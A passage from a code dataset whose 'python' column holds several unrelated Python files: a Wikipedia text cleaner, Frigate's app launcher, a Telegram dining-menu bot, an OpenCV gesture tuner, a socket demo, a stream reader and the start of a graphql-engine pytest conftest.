source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
cleaner.py
|
from utils.vector_manager import VectorManager
from pattern.en import tokenize
from time import time
import multiprocessing as mp
import os
import re
import sys
import argparse
def cleanhtml(raw_html):
"""
Removes the <doc> tags remaining from wikiExtracted data
:param raw_html: html/text content of a file with many docs
:return: only text from raw_html
"""
cleanr = re.compile('<.*?>')
cleantext = re.sub(cleanr, ' ', raw_html)
return cleantext
def remove_title(text):
"""
Removes the title of a document
:param text: text containing an article output from cleanhtml()
:return: text of the article without title
"""
index = text.find("\n\n")
if index != -1:
return text[index+2:]
else:
return text
def is_number(s):
"""
Checks if the parameter s is a number
:param s: anything
:return: true if s is a number, false otherwise
"""
try:
float(s)
return True
except ValueError:
return False
def _transform_file(file_path, debug=False):
"""
Transforms a file containing articles into a 4D list of words divided into sentences,
paragraphs and docs. Write the result to disk with the name filename_wl (words list)
:param file_path: file to transform
"""
if debug:
print("Cleaning %s" % file_path)
with open(file_path) as f:
raw = f.read().decode("latin-1")
data = cleanhtml(raw)
docs = data.split("</doc>")
del data
file_out = "%s_wl" % file_path
file_string = ""
for doc in [d.strip() for d in docs if d.strip()]:
paragraphs = [tokenize(par) for par in remove_title(cleanhtml(doc)).strip().split("\n\n") if par]
doc_a = False
for p in paragraphs:
par_a = False
for sent in p:
line = " ".join([word for word in sent.lower().split()
if word.isalpha() or is_number(word)])
if line:
file_string += line + "\n"
par_a = True
doc_a = True
if par_a:
file_string += "\n"
if doc_a:
file_string += "\n"
VectorManager.write_string(file_out, file_string.encode("latin-1"))
del file_string
if debug:
print("Done with %s" % file_path)
def transform(dirname, debug=False):
"""
Handles the parallel transformation of all the dataset into 4D lists
"""
for root, dirs, files in os.walk(dirname):
filtered_files = ["%s/%s" % (root, file) for file in files if
is_number(file.split("_")[1]) and len(file.split("_")) == 2]
threads = min(mp.cpu_count() * 4, filtered_files)
print("Starting %s processes to clean %s files" % (threads, len(filtered_files)))
i = 0
while i < len(filtered_files):
ps = []
j = 0
while j < threads and (i + j) < len(filtered_files):
if debug:
print("[%s] Creating %s of %s for file %s" % (
i, i + j, len(filtered_files), filtered_files[i + j]))
p = (mp.Process(target=_transform_file, args=(filtered_files[i + j],)))
p.start()
ps.append(p)
j += 1
if debug:
print("%s process in the list to join" % len(ps))
j = 0
while j < threads and (i + j) < len(filtered_files):
if debug:
print("[%s] Joining %s of %s for file %s" % (
i, j, len(filtered_files), filtered_files[i + j]))
ps[j].join()
j += 1
i += j
sys.stdout.flush()
def clean_data(files_path):
"""
Wrapper function to cleans the data and transforms it into 4D. Used to be called from either main or as block of
the pipeline
:param data_path: of the files to convert
:return: MySentences class ready to be fed to Word2Vec model
"""
print("[BLOCK] Transforming sentences to 4-dimensional lists")
transform(files_path)
print("[BLOCK] Done transforming data")
sys.stdout.flush()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', type=str, help="Path of the data to be used for the word embeddings"
" and clean up.", required=True)
args = parser.parse_args()
data_path = args.data
print("Cleaning data from %s" % (data_path))
begin = time()
clean_data(data_path)
end = time()
print("Total processing time: %d seconds" % (end - begin))
|
app.py
|
import json
import logging
import multiprocessing as mp
import os
from logging.handlers import QueueHandler
from typing import Dict, List
import sys
import signal
import yaml
from gevent import pywsgi
from geventwebsocket.handler import WebSocketHandler
from peewee_migrate import Router
from playhouse.sqlite_ext import SqliteExtDatabase
from playhouse.sqliteq import SqliteQueueDatabase
from frigate.config import FrigateConfig
from frigate.const import RECORD_DIR, CLIPS_DIR, CACHE_DIR
from frigate.edgetpu import EdgeTPUProcess
from frigate.events import EventProcessor, EventCleanup
from frigate.http import create_app
from frigate.log import log_process, root_configurer
from frigate.models import Event
from frigate.mqtt import create_mqtt_client
from frigate.object_processing import TrackedObjectProcessor
from frigate.record import RecordingMaintainer
from frigate.stats import StatsEmitter, stats_init
from frigate.video import capture_camera, track_camera
from frigate.watchdog import FrigateWatchdog
from frigate.zeroconf import broadcast_zeroconf
logger = logging.getLogger(__name__)
class FrigateApp:
def __init__(self):
self.stop_event = mp.Event()
self.config: FrigateConfig = None
self.detection_queue = mp.Queue()
self.detectors: Dict[str, EdgeTPUProcess] = {}
self.detection_out_events: Dict[str, mp.Event] = {}
self.detection_shms: List[mp.shared_memory.SharedMemory] = []
self.log_queue = mp.Queue()
self.camera_metrics = {}
def set_environment_vars(self):
for key, value in self.config.environment_vars.items():
os.environ[key] = value
def ensure_dirs(self):
for d in [RECORD_DIR, CLIPS_DIR, CACHE_DIR]:
if not os.path.exists(d) and not os.path.islink(d):
logger.info(f"Creating directory: {d}")
os.makedirs(d)
else:
logger.debug(f"Skipping directory: {d}")
def init_logger(self):
self.log_process = mp.Process(
target=log_process, args=(self.log_queue,), name="log_process"
)
self.log_process.daemon = True
self.log_process.start()
root_configurer(self.log_queue)
def init_config(self):
config_file = os.environ.get("CONFIG_FILE", "/config/config.yml")
self.config = FrigateConfig(config_file=config_file)
for camera_name in self.config.cameras.keys():
# create camera_metrics
self.camera_metrics[camera_name] = {
"camera_fps": mp.Value("d", 0.0),
"skipped_fps": mp.Value("d", 0.0),
"process_fps": mp.Value("d", 0.0),
"detection_enabled": mp.Value(
"i", self.config.cameras[camera_name].detect.enabled
),
"detection_fps": mp.Value("d", 0.0),
"detection_frame": mp.Value("d", 0.0),
"read_start": mp.Value("d", 0.0),
"ffmpeg_pid": mp.Value("i", 0),
"frame_queue": mp.Queue(maxsize=2),
}
def check_config(self):
for name, camera in self.config.cameras.items():
assigned_roles = list(
set([r for i in camera.ffmpeg.inputs for r in i.roles])
)
if not camera.clips.enabled and "clips" in assigned_roles:
logger.warning(
f"Camera {name} has clips assigned to an input, but clips is not enabled."
)
elif camera.clips.enabled and not "clips" in assigned_roles:
logger.warning(
f"Camera {name} has clips enabled, but clips is not assigned to an input."
)
if not camera.record.enabled and "record" in assigned_roles:
logger.warning(
f"Camera {name} has record assigned to an input, but record is not enabled."
)
elif camera.record.enabled and not "record" in assigned_roles:
logger.warning(
f"Camera {name} has record enabled, but record is not assigned to an input."
)
if not camera.rtmp.enabled and "rtmp" in assigned_roles:
logger.warning(
f"Camera {name} has rtmp assigned to an input, but rtmp is not enabled."
)
elif camera.rtmp.enabled and not "rtmp" in assigned_roles:
logger.warning(
f"Camera {name} has rtmp enabled, but rtmp is not assigned to an input."
)
def set_log_levels(self):
logging.getLogger().setLevel(self.config.logger.default)
for log, level in self.config.logger.logs.items():
logging.getLogger(log).setLevel(level)
if not "geventwebsocket.handler" in self.config.logger.logs:
logging.getLogger("geventwebsocket.handler").setLevel("ERROR")
def init_queues(self):
# Queues for clip processing
self.event_queue = mp.Queue()
self.event_processed_queue = mp.Queue()
# Queue for cameras to push tracked objects to
self.detected_frames_queue = mp.Queue(
maxsize=len(self.config.cameras.keys()) * 2
)
def init_database(self):
migrate_db = SqliteExtDatabase(self.config.database.path)
# Run migrations
del logging.getLogger("peewee_migrate").handlers[:]
router = Router(migrate_db)
router.run()
migrate_db.close()
self.db = SqliteQueueDatabase(self.config.database.path)
models = [Event]
self.db.bind(models)
def init_stats(self):
self.stats_tracking = stats_init(self.camera_metrics, self.detectors)
def init_web_server(self):
self.flask_app = create_app(
self.config,
self.db,
self.stats_tracking,
self.detected_frames_processor,
self.mqtt_client,
)
def init_mqtt(self):
self.mqtt_client = create_mqtt_client(self.config, self.camera_metrics)
def start_detectors(self):
model_shape = (self.config.model.height, self.config.model.width)
for name in self.config.cameras.keys():
self.detection_out_events[name] = mp.Event()
shm_in = mp.shared_memory.SharedMemory(
name=name,
create=True,
size=self.config.model.height * self.config.model.width * 3,
)
shm_out = mp.shared_memory.SharedMemory(
name=f"out-{name}", create=True, size=20 * 6 * 4
)
self.detection_shms.append(shm_in)
self.detection_shms.append(shm_out)
for name, detector in self.config.detectors.items():
if detector.type == "cpu":
self.detectors[name] = EdgeTPUProcess(
name,
self.detection_queue,
self.detection_out_events,
model_shape,
"cpu",
detector.num_threads,
)
if detector.type == "edgetpu":
self.detectors[name] = EdgeTPUProcess(
name,
self.detection_queue,
self.detection_out_events,
model_shape,
detector.device,
detector.num_threads,
)
def start_detected_frames_processor(self):
self.detected_frames_processor = TrackedObjectProcessor(
self.config,
self.mqtt_client,
self.config.mqtt.topic_prefix,
self.detected_frames_queue,
self.event_queue,
self.event_processed_queue,
self.stop_event,
)
self.detected_frames_processor.start()
def start_camera_processors(self):
model_shape = (self.config.model.height, self.config.model.width)
for name, config in self.config.cameras.items():
camera_process = mp.Process(
target=track_camera,
name=f"camera_processor:{name}",
args=(
name,
config,
model_shape,
self.detection_queue,
self.detection_out_events[name],
self.detected_frames_queue,
self.camera_metrics[name],
),
)
camera_process.daemon = True
self.camera_metrics[name]["process"] = camera_process
camera_process.start()
logger.info(f"Camera processor started for {name}: {camera_process.pid}")
def start_camera_capture_processes(self):
for name, config in self.config.cameras.items():
capture_process = mp.Process(
target=capture_camera,
name=f"camera_capture:{name}",
args=(name, config, self.camera_metrics[name]),
)
capture_process.daemon = True
self.camera_metrics[name]["capture_process"] = capture_process
capture_process.start()
logger.info(f"Capture process started for {name}: {capture_process.pid}")
def start_event_processor(self):
self.event_processor = EventProcessor(
self.config,
self.camera_metrics,
self.event_queue,
self.event_processed_queue,
self.stop_event,
)
self.event_processor.start()
def start_event_cleanup(self):
self.event_cleanup = EventCleanup(self.config, self.stop_event)
self.event_cleanup.start()
def start_recording_maintainer(self):
self.recording_maintainer = RecordingMaintainer(self.config, self.stop_event)
self.recording_maintainer.start()
def start_stats_emitter(self):
self.stats_emitter = StatsEmitter(
self.config,
self.stats_tracking,
self.mqtt_client,
self.config.mqtt.topic_prefix,
self.stop_event,
)
self.stats_emitter.start()
def start_watchdog(self):
self.frigate_watchdog = FrigateWatchdog(self.detectors, self.stop_event)
self.frigate_watchdog.start()
def start(self):
self.init_logger()
try:
try:
self.init_config()
except Exception as e:
print(f"Error parsing config: {e}")
self.log_process.terminate()
sys.exit(1)
self.set_environment_vars()
self.ensure_dirs()
self.check_config()
self.set_log_levels()
self.init_queues()
self.init_database()
self.init_mqtt()
except Exception as e:
print(e)
self.log_process.terminate()
sys.exit(1)
self.start_detectors()
self.start_detected_frames_processor()
self.start_camera_processors()
self.start_camera_capture_processes()
self.init_stats()
self.init_web_server()
self.start_event_processor()
self.start_event_cleanup()
self.start_recording_maintainer()
self.start_stats_emitter()
self.start_watchdog()
# self.zeroconf = broadcast_zeroconf(self.config.mqtt.client_id)
def receiveSignal(signalNumber, frame):
self.stop()
sys.exit()
signal.signal(signal.SIGTERM, receiveSignal)
server = pywsgi.WSGIServer(
("127.0.0.1", 5001), self.flask_app, handler_class=WebSocketHandler
)
try:
server.serve_forever()
except KeyboardInterrupt:
pass
self.stop()
def stop(self):
logger.info(f"Stopping...")
self.stop_event.set()
self.detected_frames_processor.join()
self.event_processor.join()
self.event_cleanup.join()
self.recording_maintainer.join()
self.stats_emitter.join()
self.frigate_watchdog.join()
self.db.stop()
for detector in self.detectors.values():
detector.stop()
while len(self.detection_shms) > 0:
shm = self.detection_shms.pop()
shm.close()
shm.unlink()
|
menubot.py
|
import base64
import json
import os
import re
import threading
import time
import traceback
from dataclasses import dataclass
from pathlib import Path
import json5
import requests
import schedule as schedule
from bs4 import BeautifulSoup
from telegram import Update
from telegram.ext import Updater, CallbackContext, Dispatcher, CommandHandler, MessageHandler, \
Filters
@dataclass
class MenuItem:
name: str
serving_size: str
price: float
calories: int
# menu_id_map[menu name] = menu id
MenuIdMap = dict[str, str]
# dining_halls[hall name][menu name] = menu id
DiningHalls = dict[str, MenuIdMap]
RawMenu = list[list[str]]
Menu = dict[str, list[MenuItem]]
def report(msg: str) -> None:
print(msg)
def get_dining_halls() -> DiningHalls:
r: str = requests.get('https://fso.ueat.utoronto.ca/FSO/ServiceMenuReport/Today').text
m: list[str] = re.findall(r"ASPx\.createControl\(MVCxClientMenu,'mnuUnits','',.*", r)
if len(m) == 0:
raise AssertionError('Failed to get menu units. Maybe API changed?')
data = m[0]
data = data.replace("ASPx.createControl(MVCxClientMenu,'mnuUnits','',", '')[:-2]
data = re.sub(r"{'ItemClick':function.*?;}},", '', data)
b64 = re.findall(r"(?<={'itemsInfo':')[A-Za-z0-9=]*(?='})", data)[0]
b64 = base64.b64decode(b64).decode('utf-8')
items_json = re.findall(r"(?<={'items':).*(?=})", data)[0]
items = json5.loads(items_json)[0]['items']
dining_halls: DiningHalls = {}
# Get dining hall names
for i in items:
first_id = i['items'][0]['name']
name = re.findall(f"(?<=.)[A-Za-z0-9() ]+(?=.*\\${first_id})", b64)[-1]
dining_halls[name] = {}
# Get menu names
for menu in i['items']:
mn = re.findall(f"(?<=\\${menu['name']}).*?[A-Za-z0-9() ]+(?=.)", b64)[0]
mn = re.findall(r"[A-Za-z0-9() ]+", mn)[0]
dining_halls[name][mn] = menu['name']
return dining_halls
def get_menu(id: str) -> tuple[RawMenu, Menu]:
r = requests.post(f" https://fso.ueat.utoronto.ca/FSO/ServiceMenuReport/GetReport/{id}").text
s = BeautifulSoup(r, 'html.parser')
# Parse table
t = s.find('table')
d = [[i.text.strip() for i in r.find_all('td')] for r in t.find_all('tr')]
data = {}
current: list[MenuItem] = []
for i in d[1:]:
# Title
if len(i) == 1:
current = []
data[i[0]] = current
# Item
else:
current.append(MenuItem(i[0], i[1], float(i[2] or '-1'), int(i[3] or '-1')))
return d, data
def filter_menu(menu: Menu) -> Menu:
menu: Menu = \
{m: [i for i in menu[m] if i.price != -1] for m in menu}
for m in menu:
for i in menu[m]:
i.name = i.name.replace(' - Small', '').replace(' - Large', '')
names = {n.name for n in menu[m]}
menu[m] = [[i for i in menu[m] if i.name == n][0] for n in names]
return menu
if __name__ == '__main__':
# Find telegram token
path = Path(os.path.abspath(__file__)).parent
db_path = path.joinpath('menu_bot_database.json')
if 'tg_token' in os.environ:
tg_token = os.environ['tg_token']
else:
with open(path.joinpath('menu_bot_token.txt'), 'r', encoding='utf-8') as f:
tg_token = f.read().strip()
# Telegram login
updater = Updater(token=tg_token, use_context=True)
dispatcher: Dispatcher = updater.dispatcher
# Database
def save_db():
with open(db_path, 'w', encoding='utf-8') as f:
json.dump(database, f)
schedule.clear()
for d in database:
def func():
menu_helper(d[0], d[1])
schedule.every().day.at('07:00').do(func)
database: list[tuple[int, list[str]]]
if os.path.isfile(db_path):
with open(db_path, 'r', encoding='utf-8') as f:
database = json.load(f)
save_db()
else:
database = []
def r(u: Update, msg: str, md=True):
updater.bot.sendMessage(chat_id=u.effective_chat.id, text=msg,
parse_mode='Markdown' if md else None)
def start(u: Update, c: CallbackContext):
r(u, 'Hi, start with /halls')
def error(u: Update, c: CallbackContext):
traceback.print_exc()
r(u, str(c.error), False)
def dining_halls(u: Update, c: CallbackContext):
halls = get_dining_halls()
r(u, '*Available Dining Halls:* \n' + '\n'.join(halls.keys()) + '\n\nNext: /menus <hall>')
def get_hall_with_name(hall: str) -> tuple[str, MenuIdMap]:
hall = hall.lower()
halls = get_dining_halls()
h = [h for h in halls if h.lower().startswith(hall)]
if len(h) == 0:
raise AssertionError(f'No dining hall {hall} found.')
return h[0], halls[h[0]]
def get_menu_with_name(hall: str, menu: str) -> tuple[str, str, Menu]:
menu = menu.lower()
hall, h = get_hall_with_name(hall)
m = [m for m in h if m.lower().startswith(menu)]
if len(m) == 0:
raise AssertionError(f'No menu {menu} found in {hall}.')
return hall, m[0], get_menu(h[m[0]])[1]
def get_menu_cats(hall: str, menu: str, cats: list[str]) -> tuple[str, str, Menu]:
hall, menu, m = get_menu_with_name(hall, menu)
m = filter_menu(m)
copy_cats = cats.copy()
cats = [c.lower() for c in cats]
cats = [([n for n in m if n.lower().startswith(c)] or [''])[0] for c in cats]
cats = [c for c in cats if c != '']
if len(cats) == 0:
raise AssertionError(f'No categories in {copy_cats} are valid.')
m = {c: m[c] for c in cats}
return hall, menu, m
def menus(u: Update, c: CallbackContext):
if len(c.args) != 1:
r(u, 'Usage: /menus <hall>')
return
hall = c.args[0]
hall, h = get_hall_with_name(hall)
r(u, '*Available Menus:* \n' + '\n'.join(h.keys()) + '\n\nNext: /cats <hall> <menu>')
def categories(u: Update, c: CallbackContext):
if len(c.args) < 2:
r(u, 'Usage: /categories <hall> <menu>')
return
hall, menu = c.args
hall, menu, m = get_menu_with_name(hall, menu)
r(u, '*Available Menus:* \n' + '\n'.join(m.keys()) + '\n\nNext: /menu <hall> <menu> <cats>')
def menu_helper(chat_id: int, args: list[str]):
print('Menu helper called.', chat_id, args)
hall, menu = args[:2]
cats = args[2:]
hall, menu, m = get_menu_cats(hall, menu, cats)
for n in m:
m[n].sort(key=lambda x: -x.price)
msg = f"*Today's Menu for {menu}:* \n" + \
'\n'.join(f"\n*{n}:* \n" + '\n'.join(
f"{i + 1}. {m[n][i].name} - ${m[n][i].price}" for i in range(len(m[n])))
for n in m)
updater.bot.sendMessage(chat_id=chat_id, text=msg, parse_mode='Markdown')
def menu(u: Update, c: CallbackContext):
if len(c.args) < 2:
r(u, 'Usage: /menu <hall> <menu> <categories>')
return
menu_helper(u.effective_chat.id, c.args)
def channel_update(u: Update, c: CallbackContext):
if u.channel_post is None or u.channel_post.text is None:
return
args = u.channel_post.text.split()
cmd = args[0]
args = args[1:]
id = u.effective_chat.id
if cmd == '/config':
database.append((id, args))
save_db()
menu_helper(id, args)
r(u, 'Scheduled every day at 7:00.')
elif cmd == '/clear':
to_remove = [d for d in database if d[0] == id]
[database.remove(d) for d in to_remove]
save_db()
elif cmd == '/debug':
r(u, json.dumps(database))
# Scheduler thread
def thread_func():
while True:
schedule.run_pending()
time.sleep(2)
threading.Thread(target=thread_func).start()
# Commands
dispatcher.add_error_handler(error)
dispatcher.add_handler(CommandHandler('start', start))
dispatcher.add_handler(CommandHandler('halls', dining_halls))
dispatcher.add_handler(CommandHandler('menus', menus))
dispatcher.add_handler(CommandHandler('categories', categories))
dispatcher.add_handler(CommandHandler('cats', categories))
dispatcher.add_handler(CommandHandler('menu', menu))
dispatcher.add_handler(MessageHandler(Filters.update, channel_update))
updater.start_polling()
#
# menu = filter_menu(get_menu('f1343803-84f6-4b4f-bbfd-a374ed6bd00e')[1])
# menu = {m: menu[m] for m in ['Soup', 'Lunch Entree', 'Pan Station']}
|
test.py
|
import cv2
import time
from motion import Motion
from tornado import web, ioloop
import threading
import json
import requests
from config import config
import logging
from motion import Motion
from config import config
import main
def nothing(x):
pass
def ManageMotion():
motion = Motion()
# Param on the fly
cv2.namedWindow('paramMinMax')
cv2.createTrackbar('MAX H', 'paramMinMax', 1, 255, nothing)
cv2.createTrackbar('MAX S', 'paramMinMax', 1, 255, nothing)
cv2.createTrackbar('MAX V', 'paramMinMax', 1, 255, nothing)
cv2.createTrackbar('MIN H', 'paramMinMax', 1, 255, nothing)
cv2.createTrackbar('MIN S', 'paramMinMax', 1, 255, nothing)
cv2.createTrackbar('MIN V', 'paramMinMax', 1, 255, nothing)
cv2.setTrackbarPos('MAX H', 'paramMinMax', config['hand']['hsv_max_blue'][0])
cv2.setTrackbarPos('MAX S', 'paramMinMax', config['hand']['hsv_max_blue'][1])
cv2.setTrackbarPos('MAX V', 'paramMinMax', config['hand']['hsv_max_blue'][2])
cv2.setTrackbarPos('MIN H', 'paramMinMax', config['hand']['hsv_min_blue'][0])
cv2.setTrackbarPos('MIN S', 'paramMinMax', config['hand']['hsv_min_blue'][1])
cv2.setTrackbarPos('MIN V', 'paramMinMax', config['hand']['hsv_min_blue'][2])
cv2.namedWindow('paramSearchRange')
cv2.createTrackbar('INC H', 'paramSearchRange', 1, 255, nothing)
cv2.createTrackbar('INC S', 'paramSearchRange', 1, 255, nothing)
cv2.createTrackbar('INC V', 'paramSearchRange', 1, 255, nothing)
cv2.createTrackbar('DEC H', 'paramSearchRange', 1, 255, nothing)
cv2.createTrackbar('DEC S', 'paramSearchRange', 1, 255, nothing)
cv2.createTrackbar('DEC V', 'paramSearchRange', 1, 255, nothing)
cv2.setTrackbarPos('INC H', 'paramSearchRange', config['hand']['hsv_inc_blue'][0])
cv2.setTrackbarPos('INC S', 'paramSearchRange', config['hand']['hsv_inc_blue'][1])
cv2.setTrackbarPos('INC V', 'paramSearchRange', config['hand']['hsv_inc_blue'][2])
cv2.setTrackbarPos('DEC H', 'paramSearchRange', config['hand']['hsv_dec_blue'][0])
cv2.setTrackbarPos('DEC S', 'paramSearchRange', config['hand']['hsv_dec_blue'][1])
cv2.setTrackbarPos('DEC V', 'paramSearchRange', config['hand']['hsv_dec_blue'][2])
frameIdx = 0
currentSliding = "None"
timeElapsedSinceLastSlide = time.time()
while motion.IsActive():
# Refresh OpenCV
cv2.waitKey(1)
main.ManageCommands(motion)
# Refresh config from param
config['hand']['hsv_upper_blue'] = [cv2.getTrackbarPos('MAX H', 'paramMinMax'), cv2.getTrackbarPos('MAX S', 'paramMinMax'), cv2.getTrackbarPos('MAX V', 'paramMinMax')]
config['hand']['hsv_lower_blue'] = [cv2.getTrackbarPos('MIN H', 'paramMinMax'), cv2.getTrackbarPos('MIN S', 'paramMinMax'), cv2.getTrackbarPos('MIN V', 'paramMinMax')]
config['hand']['hsv_inc_blue'] = [cv2.getTrackbarPos('INC H', 'paramSearchRange'), cv2.getTrackbarPos('INC S', 'paramSearchRange'), cv2.getTrackbarPos('INC V', 'paramSearchRange')]
config['hand']['hsv_dec_blue'] = [cv2.getTrackbarPos('DEC H', 'paramSearchRange'), cv2.getTrackbarPos('DEC S', 'paramSearchRange'), cv2.getTrackbarPos('DEC V', 'paramSearchRange')]
# Manage motion and gestures
motion.GetInformationOnNextFrame()
# Infos movement
try:
cv2.putText(motion.frameDifference, "Elapsed: " + str(motion.TimeElapsedSinceLastMotion()) + "/" + str(config['timeToWaitWhenNoMovementBeforeSleep']), (5, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)
cv2.putText(motion.frameDifference, "Movement: " + str(motion.movementRatio) + "/" + str(config['frameDifferenceRatioForMovement']), (5, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)
cv2.imshow('Movement detected', motion.frameDifference)
except:
pass
if motion.TimeElapsedSinceLastMotion() > config['timeToWaitWhenNoMovementBeforeSleep']:
cv2.putText(motion.currentFrame, "SLEEP MODE NO MOVEMENT", (5, 150), cv2.FONT_HERSHEY_SIMPLEX, 1, (255, 255, 255), 2)
cv2.imshow('Current Frame', motion.currentFrame)
time.sleep(config['timeToSleepWhenNoMovement'])
gesture = motion.GetGesture()
if gesture.properties['palm']:
print("PALM")
threading.Thread(target=main.SendGesture, args=(gesture,)).start()
# Gesture infos
try:
#print("Frame: " + str(frameIdx))
frameIdx += 1
#print(gesture.properties)
if motion.handTracked is None:
cv2.putText(motion.currentFrame, "Seach Palm", (5, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, 200, 1)
cv2.imshow('Current Frame', motion.currentFrame)
cv2.imshow('Mask from HSV Range', motion.mask_rafined)
cv2.putText(motion.currentFrame, "Width: " + str(gesture.recW), (5, 200), cv2.FONT_HERSHEY_SIMPLEX, 1, 200, 1)
cv2.putText(motion.currentFrame, "Height: " + str(gesture.recH), (5, 250), cv2.FONT_HERSHEY_SIMPLEX, 1, 200, 1)
cv2.putText(motion.currentFrame, "SRatio: " + str(gesture.recH / gesture.recW), (5, 150), cv2.FONT_HERSHEY_SIMPLEX, 1, 200, 1)
cv2.rectangle(motion.currentFrame, (gesture.recX, gesture.recY), (gesture.recX + gesture.recW, gesture.recY + gesture.recH), (0, 255, 0), 2)
cv2.putText(motion.currentFrame, "MSize: " + str(gesture.moments['m00']), (5, 100), cv2.FONT_HERSHEY_SIMPLEX, 1, 200, 1)
cv2.drawContours(motion.currentFrame, [gesture.handContour], 0, (0, 255, 0), 3)
cv2.circle(motion.currentFrame, (int(gesture.centerX), int(gesture.centerY)), int(gesture.radius / 1.5), [255, 0, 255], 1)
cv2.circle(motion.currentFrame, (int(gesture.centerX), int(gesture.centerY)), int(gesture.radius / 3.2), [255, 0, 255], 1)
cv2.putText(motion.currentFrame, "A: " + str(gesture.properties['angle']), (5, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, 200)
if gesture.properties['palm']:
cv2.putText(motion.currentFrame, "PALM", (5, 400), cv2.FONT_HERSHEY_SIMPLEX, 2, 150, 3)
elif gesture.properties['thumbsUp']:
cv2.putText(motion.currentFrame, "THUMBS UP", (5, 400), cv2.FONT_HERSHEY_SIMPLEX, 2, 150, 3)
elif gesture.properties['thumbsDown']:
cv2.putText(motion.currentFrame, "THUMBS DOWN", (5, 400), cv2.FONT_HERSHEY_SIMPLEX, 2, 150, 3)
if gesture.properties['slideUp'] or gesture.properties['slideDown'] or gesture.properties['slideRight'] or gesture.properties['slideLeft']:
timeElapsedSinceLastSlide = time.time()
currentSliding ="UP" if gesture.properties['slideUp'] else "DOWN" if gesture.properties['slideDown'] else "RIGHT" if gesture.properties['slideRight'] else "LEFT"
if time.time() - timeElapsedSinceLastSlide < 1:
cv2.putText(motion.currentFrame, "Sliding " + currentSliding, (5, 450), cv2.FONT_HERSHEY_SIMPLEX, 2, 150, 3)
for defect in gesture.palmDefects:
cv2.line(motion.currentFrame, defect[0], defect[1], [255, 0, 0], 2)
cv2.circle(motion.currentFrame, defect[2], 6, [0, 0, 255], -1)
cv2.imshow('Current Frame', motion.currentFrame)
except:
pass
pressedKey = cv2.waitKey(33)
if pressedKey == 27: # Esc key to stop
break
motion.Dispose()
if __name__ == '__main__':
threading.Thread(target=ManageMotion).start()
application = web.Application([
(r"/takePhoto", main.CommandHandler),
])
application.listen(3001)
ioloop.IOLoop.current().start()
|
socket-preview-progs.py
|
"Sockets and independent programs"
'''
Although sockets work for threads, the shared memory model of threads often allows
them to employ simpler communication devices such as shared names and objects and
queues. Sockets tend to shine brighter when used for IPC by separate processes and
independently launched programs.
'''
"""
same socket, but talk between independent programs too, not just threads;
server here runs in a process and serves both process and thread clients;
sockets are machine-global, much like fifos: don't require shared memory
"""
from socket_preview import server, client # both use same port number
import sys, os
from threading import Thread
mode = int(sys.argv[1]) # run server in this process
if mode == 1:
server()
elif mode == 2: # run client in this process
client('client:process=%s' % os.getpid())
elif mode == 3:
for i in range(5): # run 5 client threads in process
Thread(target=client, args=('client:thread=%s' % i,)).start()
"""
First, start the server in a process as an independently launched program in
its own window; this process runs perpetually waiting for clients to request connections.
C:\...\PP4E\System\Processes> socket-preview-progs.py 1
Now, in another window, run a few clients in both processes and thread, by launching
them as independent programs—using 2 as the command-line argument runs a single
client process, but 3 spawns five threads to converse with the server on parallel:
C:\...\PP4E\System\Processes> socket-preview-progs.py 2
C:\...\PP4E\System\Processes> socket-preview-progs.py 3
"""
|
nbsr.py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# no unicode literals
import threading
try:
from queue import Queue, Empty
except BaseException:
from Queue import Queue, Empty
# Non-blocking stream reader inspired by:
# https://stackoverflow.com/q/41431882/149111
class NonBlockingStreamReader:
def __init__(self, stream):
self.stream = stream
self.queue = Queue()
self.stop_event = threading.Event()
def populateQueue(stream, queue):
while not self.stop_event.is_set():
try:
line = stream.readline()
if line:
queue.put(line)
continue
except IOError:
pass
if not self.stop_event.is_set():
raise EndOfStreamError
break
self.thread = threading.Thread(
target=populateQueue, args=(self.stream, self.queue)
)
self.thread.daemon = True
self.thread.start()
def shutdown(self):
self.stop_event.set()
def stop(self, timeout=5):
self.thread.join(timeout=timeout)
def readline(self, timeout=None):
try:
return self.queue.get(block=timeout is not None, timeout=timeout)
except Empty:
return None
class EndOfStreamError(Exception):
pass
|
conftest.py
|
import pytest
import time
from context import HGECtx, HGECtxError, ActionsWebhookServer, EvtsWebhookServer, HGECtxGQLServer, GQLWsClient, PytestConf, GraphQLWSClient
import threading
import random
from datetime import datetime
import sys
import os
from collections import OrderedDict
from validate import assert_response_code
def pytest_addoption(parser):
parser.addoption(
"--hge-urls",
metavar="HGE_URLS",
help="csv list of urls for graphql-engine",
required=False,
nargs='+'
)
parser.addoption(
"--pg-urls", metavar="PG_URLS",
help="csv list of urls for connecting to Postgres directly",
required=False,
nargs='+'
)
parser.addoption(
"--hge-key", metavar="HGE_KEY", help="admin secret key for graphql-engine", required=False
)
parser.addoption(
"--hge-webhook", metavar="HGE_WEBHOOK", help="url for graphql-engine's access control webhook", required=False
)
parser.addoption(
"--test-webhook-insecure", action="store_true",
help="Run Test cases for insecure https webhook"
)
parser.addoption(
"--test-webhook-request-context", action="store_true",
help="Run Test cases for testing webhook request context"
)
parser.addoption(
"--hge-jwt-key-file", metavar="HGE_JWT_KEY_FILE", help="File containing the private key used to encode jwt tokens using RS512 algorithm", required=False
)
parser.addoption(
"--hge-jwt-conf", metavar="HGE_JWT_CONF", help="The JWT conf", required=False
)
parser.addoption(
"--test-cors", action="store_true",
required=False,
help="Run testcases for CORS configuration"
)
parser.addoption(
"--test-ws-init-cookie",
metavar="read|noread",
required=False,
help="Run testcases for testing cookie sending over websockets"
)
parser.addoption(
"--test-metadata-disabled", action="store_true",
help="Run Test cases with metadata queries being disabled"
)
parser.addoption(
"--test-graphql-disabled", action="store_true",
help="Run Test cases with GraphQL queries being disabled"
)
parser.addoption(
"--test-hge-scale-url",
metavar="<url>",
required=False,
help="Run testcases for horizontal scaling"
)
parser.addoption(
"--test-allowlist-queries", action="store_true",
help="Run Test cases with allowlist queries enabled"
)
parser.addoption(
"--test-logging",
action="store_true",
default=False,
required=False,
help="Run testcases for logging"
)
parser.addoption(
"--test-function-permissions",
action="store_true",
required=False,
help="Run manual function permission tests"
)
parser.addoption(
"--test-jwk-url",
action="store_true",
default=False,
required=False,
help="Run testcases for JWK url behaviour"
)
parser.addoption(
"--accept",
action="store_true",
default=False,
required=False,
